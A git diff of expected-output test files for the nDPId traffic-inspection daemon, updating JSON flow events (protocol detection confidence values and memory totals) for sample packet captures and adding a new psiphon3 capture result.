00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136837,"flow_last_seen":1467353136837,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"210.47.12.20","src_port":22793,"dst_port":33738,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136837,"flow_last_seen":1467353136837,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"210.47.12.20","src_port":22793,"dst_port":33738,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136837,"flow_last_seen":1467353136837,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"210.47.12.19","src_port":22793,"dst_port":33738,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136837,"flow_last_seen":1467353136837,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"210.47.12.19","src_port":22793,"dst_port":33738,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
-00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":92,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353191538,"flow_last_seen":1467353191606,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":210,"flow_tot_l4_payload_len":355,"flow_avg_l4_payload_len":177,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"36.110.220.15","src_port":50765,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":92,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353191538,"flow_last_seen":1467353191606,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":210,"flow_tot_l4_payload_len":355,"flow_avg_l4_payload_len":177,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"36.110.220.15","src_port":50765,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 00584{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353144633,"flow_last_seen":1467353144633,"flow_idle_time":7580000,"flow_min_l4_payload_len":293,"flow_max_l4_payload_len":293,"flow_tot_l4_payload_len":293,"flow_avg_l4_payload_len":293,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"117.79.81.135","dst_ip":"192.168.115.8","src_port":80,"dst_port":50443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":100,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353196441,"flow_last_seen":1467353196535,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":340,"flow_tot_l4_payload_len":480,"flow_avg_l4_payload_len":240,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"111.206.22.77","src_port":50776,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"}} -00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":101,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353196740,"flow_last_seen":1467353196835,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":1132,"flow_tot_l4_payload_len":1272,"flow_avg_l4_payload_len":636,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"111.206.22.77","src_port":50777,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"}} -00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":104,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1467353197951,"flow_last_seen":1467353198052,"flow_idle_time":7580000,"flow_min_l4_payload_len":70,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":1470,"flow_avg_l4_payload_len":490,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"111.206.22.77","src_port":50779,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"4":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"}} -00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1467353179045,"flow_last_seen":1467353203065,"flow_idle_time":200000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":1197,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.5.38","dst_ip":"239.255.255.250","src_port":58897,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} -00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1467353166729,"flow_last_seen":1467353166729,"flow_idle_time":200000,"flow_min_l4_payload_len":123,"flow_max_l4_payload_len":123,"flow_tot_l4_payload_len":123,"flow_avg_l4_payload_len":123,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.5.63","dst_ip":"239.255.255.250","src_port":60976,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 
+00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":100,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353196441,"flow_last_seen":1467353196535,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":340,"flow_tot_l4_payload_len":480,"flow_avg_l4_payload_len":240,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"111.206.22.77","src_port":50776,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"}} +00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":101,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353196740,"flow_last_seen":1467353196835,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":1132,"flow_tot_l4_payload_len":1272,"flow_avg_l4_payload_len":636,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"111.206.22.77","src_port":50777,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"}} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":104,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1467353197951,"flow_last_seen":1467353198052,"flow_idle_time":7580000,"flow_min_l4_payload_len":70,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":1470,"flow_avg_l4_payload_len":490,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"111.206.22.77","src_port":50779,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"6":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"}} +00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1467353179045,"flow_last_seen":1467353203065,"flow_idle_time":200000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":1197,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.5.38","dst_ip":"239.255.255.250","src_port":58897,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1467353166729,"flow_last_seen":1467353166729,"flow_idle_time":200000,"flow_min_l4_payload_len":123,"flow_max_l4_payload_len":123,"flow_tot_l4_payload_len":123,"flow_avg_l4_payload_len":123,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.5.63","dst_ip":"239.255.255.250","src_port":60976,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 
00598{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136834,"flow_last_seen":1467353136834,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"111.117.101.81","src_port":22793,"dst_port":10162,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136834,"flow_last_seen":1467353136834,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"111.117.101.81","src_port":22793,"dst_port":10162,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":103,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1467353197131,"flow_last_seen":1467353203157,"flow_idle_time":200000,"flow_min_l4_payload_len":123,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":1161,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.1","dst_ip":"239.255.255.250","src_port":50945,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 
+00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":103,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1467353197131,"flow_last_seen":1467353203157,"flow_idle_time":200000,"flow_min_l4_payload_len":123,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":1161,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.1","dst_ip":"239.255.255.250","src_port":50945,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00638{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":400,"flow_first_seen":1467353136432,"flow_last_seen":1467353136981,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":1067,"flow_tot_l4_payload_len":148446,"flow_avg_l4_payload_len":371,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"1.173.5.226","dst_ip":"192.168.115.8","src_port":22636,"dst_port":22793,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Unknown","breed":"Unrated"}} 00600{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1467353136439,"flow_last_seen":1467353136660,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":1067,"flow_tot_l4_payload_len":3271,"flow_avg_l4_payload_len":654,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.198.7.89","src_port":22793,"dst_port":16039,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1467353136439,"flow_last_seen":1467353136660,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":1067,"flow_tot_l4_payload_len":3271,"flow_avg_l4_payload_len":654,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.198.7.89","src_port":22793,"dst_port":16039,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353172446,"flow_last_seen":1467353172450,"flow_idle_time":7580000,"flow_min_l4_payload_len":235,"flow_max_l4_payload_len":785,"flow_tot_l4_payload_len":1020,"flow_avg_l4_payload_len":510,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"23.41.133.163","src_port":50500,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} -00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1467353189784,"flow_last_seen":1467353196145,"flow_idle_time":200000,"flow_min_l4_payload_len":431,"flow_max_l4_payload_len":511,"flow_tot_l4_payload_len":8571,"flow_avg_l4_payload_len":476,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.5.38","dst_ip":"239.255.255.250","src_port":1900,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 
+00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353172446,"flow_last_seen":1467353172450,"flow_idle_time":7580000,"flow_min_l4_payload_len":235,"flow_max_l4_payload_len":785,"flow_tot_l4_payload_len":1020,"flow_avg_l4_payload_len":510,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"23.41.133.163","src_port":50500,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1467353189784,"flow_last_seen":1467353196145,"flow_idle_time":200000,"flow_min_l4_payload_len":431,"flow_max_l4_payload_len":511,"flow_tot_l4_payload_len":8571,"flow_avg_l4_payload_len":476,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.5.38","dst_ip":"239.255.255.250","src_port":1900,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136833,"flow_last_seen":1467353136834,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"36.237.154.69","src_port":22793,"dst_port":4316,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136833,"flow_last_seen":1467353136834,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"36.237.154.69","src_port":22793,"dst_port":4316,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00568{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","packets-captured":2557,"packets-processed":2557,"total-skipped-flows":0,"total-l4-payload-len":2121102,"total-not-detected-flows":34,"total-guessed-flows":2,"total-detected-flows":71,"total-detection-updates":2,"total-updates":0,"current-active-flows":0,"total-active-flows":107,"total-idle-flows":107,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":567,"global_ts_msec":1467353203157} @@ -573,9 +573,9 @@ ~~ total active/idle flows...: 107/107 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 6074961 bytes -~~ total memory freed........: 6074961 bytes -~~ total allocations/frees...: 121223/121223 +~~ total memory allocated....: 6208595 bytes +~~ total memory freed........: 6208595 bytes +~~ total allocations/frees...: 123985/123985 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 451 chars ~~ json string max len.......: 2182 chars diff --git a/test/results/pptp.pcap.out b/test/results/pptp.pcap.out index 28e74b55e..f91696f66 100644 --- a/test/results/pptp.pcap.out +++ b/test/results/pptp.pcap.out 
@@ -4,8 +4,8 @@ 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"pptp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1451895531141,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1451895531141,"pkt":"AhoR+E9+0N+aZRdHCABFAAA8SqVAAEAGB\/LAqCsWv2U9AaGWBrt+ULaEAAAAAKACchAUeAAAAgQFtAQCCAoAB\/whAAAAAAEDAwo="} 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"pptp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1451895531183,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1451895531183,"pkt":"0N+aZRdHAhoR+E9+CABFUAA8Q2pAAPwGUty\/ZT0BwKgrFga7oZZ1tjA4flC2haASD5Yd2AAAAgQFMgEBCAoLt6rxAAf8IQQCAAA="} 00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"pptp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1451895531183,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1451895531183,"pkt":"AhoR+E9+0N+aZRdHCABFAAA0SqZAAEAGB\/nAqCsWv2U9AaGWBrt+ULaFdbYwOYAQchDmkwAAAQEICgAH\/CwLt6rx"} -00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"pptp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1451895531141,"flow_last_seen":1451895531183,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":156,"flow_tot_l4_payload_len":156,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1451895531183,"l3_proto":"ip4","src_ip":"192.168.43.22","dst_ip":"191.101.61.1","src_port":41366,"dst_port":1723,"l4_proto":"tcp","ndpi": 
{"confidence": {"4":"DPI"},"proto":"PPTP","breed":"Acceptable","category":"VPN"}} -00673{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":24,"source":"pptp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1451895531141,"flow_last_seen":1451895536574,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":168,"flow_tot_l4_payload_len":740,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1451895536574,"l3_proto":"ip4","src_ip":"192.168.43.22","dst_ip":"191.101.61.1","src_port":41366,"dst_port":1723,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"PPTP","breed":"Acceptable","category":"VPN"}} +00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"pptp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1451895531141,"flow_last_seen":1451895531183,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":156,"flow_tot_l4_payload_len":156,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1451895531183,"l3_proto":"ip4","src_ip":"192.168.43.22","dst_ip":"191.101.61.1","src_port":41366,"dst_port":1723,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"PPTP","breed":"Acceptable","category":"VPN"}} +00673{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":24,"source":"pptp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1451895531141,"flow_last_seen":1451895536574,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":168,"flow_tot_l4_payload_len":740,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1451895536574,"l3_proto":"ip4","src_ip":"192.168.43.22","dst_ip":"191.101.61.1","src_port":41366,"dst_port":1723,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"6":"DPI"},"proto":"PPTP","breed":"Acceptable","category":"VPN"}} 00551{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":24,"source":"pptp.pcap","alias":"nDPId-test","packets-captured":24,"packets-processed":24,"total-skipped-flows":0,"total-l4-payload-len":740,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1451895536574} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 24/24 @@ -15,9 +15,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5872187 bytes -~~ total memory freed........: 5872187 bytes -~~ total allocations/frees...: 118139/118139 +~~ total memory allocated....: 6005821 bytes +~~ total memory freed........: 6005821 bytes +~~ total allocations/frees...: 120901/120901 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 460 chars ~~ json string max len.......: 678 chars diff --git a/test/results/psiphon3.pcap.out b/test/results/psiphon3.pcap.out new file mode 100644 index 000000000..dc476f61a --- /dev/null +++ b/test/results/psiphon3.pcap.out 
@@ -0,0 +1,26 @@ +00459{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"psiphon3.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} +00548{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"psiphon3.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1613865079123} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"psiphon3.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1613865079123,"flow_last_seen":1613865079123,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1613865079123,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"104.18.151.190","src_port":40557,"dst_port":443,"l4_proto":"tcp","flow_datalink":12,"flow_max_packets":3} 
